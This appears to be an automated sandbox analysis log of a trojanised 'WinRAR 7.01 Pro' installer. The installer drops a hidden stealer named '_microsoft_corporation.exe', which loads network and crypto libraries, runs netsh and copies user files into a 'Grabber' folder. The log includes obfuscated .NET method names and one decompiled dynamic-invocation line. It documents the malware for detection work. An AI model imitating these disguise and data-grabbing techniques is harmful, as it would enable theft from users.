Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

File written: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: WinRAR 7.01 Pro.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: WinRAR 7.01 Pro.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: WinRAR 7.01 Pro.exe

Static file information: File size 4492800 > 1048576

Source: WinRAR 7.01 Pro.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x444200

Source: WinRAR 7.01 Pro.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: WinRAR 7.01 Pro.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: winload_prod.pdb source: Temp.txt.3.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb. source: winrar_x64_701ar.exe, 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, winrar_x64_701ar.exe, 00000001.00000000.1732532054.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.3.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.3.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.3.dr
Source:	Binary string: _.pdb source: _microsoft_corporation.exe, 00000003.00000003.1786072465.00000000026BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\AppData\Local\Temporary Projects\WinRAR 7.01 Pro\obj\x86\Debug\WinRAR 7.01 Pro.pdb source: WinRAR 7.01 Pro.exe
Source:	Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar_x64_701ar.exe, 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, winrar_x64_701ar.exe, 00000001.00000000.1732532054.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, pteXN7SPQvYX16605Cl.cs

.Net Code: Type.GetTypeFromHandle(TGLuQFKv2vFBySV592Z.qqBCSd2atm(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(TGLuQFKv2vFBySV592Z.qqBCSd2atm(16777269)),Type.GetTypeFromHandle(TGLuQFKv2vFBySV592Z.qqBCSd2atm(16777262))})

Source: WinRAR 7.01 Pro.exe	Static PE information: real checksum: 0x0 should be: 0x454dc7
Source: _microsoft_corporation.exe.0.dr	Static PE information: real checksum: 0x23bfb should be: 0x846fe

Source: winrar_x64_701ar.exe.0.dr	Static PE information: section name: .didat
Source: winrar_x64_701ar.exe.0.dr	Static PE information: section name: _RDATA

Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, mMWHY4ZubZBi2xiXsXE.cs	High entropy of concatenated method names: 'fyJRqpSnlJ', 'GaxR56x8jr', 'YqmRdgpyfX', 'AWLRhmV4r1', 'jiqRBLhylY', 'Sm6Rnn1IGi', 'rSKR7XWOvi', 'l0GZc0wXjV', 'WkPRoKT498', 'kwtRCquTxq'
Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, Gym7vFKz1tgEEwOYTpd.cs	High entropy of concatenated method names: 'G7WZXmK2Sg', 'pYIZRDZQWU', 'n1fZNcEXCG', 'R5XZL99WpL', 'oOgZJoxUhI', 'TvyZFbTiKB', 'RurZWbCvEI', 'pDFZMlkwGp', 'qkTZbOlFs0', 'y8HZTPvbVe'
Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, zLnbI2STNAl5Fvt4s2O.cs	High entropy of concatenated method names: 'eXmSqB1CrO', 'rB2SntuPD0', 'O3xSEmNtwS', 'JLAS9olAO8', 'yJfS3jJTjT', 'TSBSDO8sJW', 'OG4SloEGK5', 'o8WSVKB7r8', 'XcvSGR6q2J', 'wb8Sy5wcjo'
Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, pteXN7SPQvYX16605Cl.cs	High entropy of concatenated method names: 'XHU8ZUuCVqEUsoE43rl', 'KlJwkfuYF7YAMg8nSC0', 'kw4KsaLuMs', 'qGKbBoukKyF1o8uregI', 'H9legvu3CGfgKqP4imH', 'XAomIIuH7BLVmPmd2cI', 'lO1uChuwv8aZMyAn7RE', 'AfSrQPuDmcWT5rh7Ffm', 'C6ZTQnulcKESS925Cn3', 'Cdl3JAug7nRTPeX9TJ1'
Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, ecVo2lNnCTMA9nf0dn.cs	High entropy of concatenated method names: 'jiy3dhpiZ', 'iDPHDD3it', 'n8NweciPk', 'FwbVDpZIE', 'k6v4WWg8t', 'uxScXX8SR', 'BKNQWWkXI', 'OumU9MyFt', 'Wtyjma9A9', 'YNbO47Y5f'
Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, Mv3iW76cioOfWMJS7a2.cs	High entropy of concatenated method names: 'adbphhCUBl', 'y9jpBYmvdc', 'ilfCKOT4keKJ2pWsKRF', 'EFWLHDTxAVfLEE7xfNm', 'C3nJLaTG3mcq4PNLjy0', 'QjwTy4TconTGIHOYAYA', 'FFwHLnTyEvncRPpHe8B', 'i0L3F1TQQ8cCZUErwAi', 'i2m6yIiuBq', 'w8B6QDDBdU'
Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, DbH4j6pwrPw3CdLCllZ.cs	High entropy of concatenated method names: 'j6cplFGl1Q', 'Wt6pgegOSa', 'libp4Kl6lc', 'yftpcf76JE', 'znbpjK3CID', 'xYupf3Ubvw', 'xhVpPve6Ob', 'K6NS6NvaHK', 'pOUSZSB1Sn', 'WA0Si3NTLu'
Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, fbxvKo6qdIcSHi0cFDA.cs	High entropy of concatenated method names: 'b5m6CAW8fm', 'XfO69n4qh7', 'Equals', 'GetHashCode', 'k8B6khmD3p', 'ToString', 'cnsvFKTnb76sG3mdEk6', 'P2eEbyT7dPyYkrWUw4c', 'sC4i2xThYBTPAIupjWA', 'UHpGS7TBhVpueQZHhMo'

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File created: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe			Jump to dropped file
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File created: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe			Jump to dropped file

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
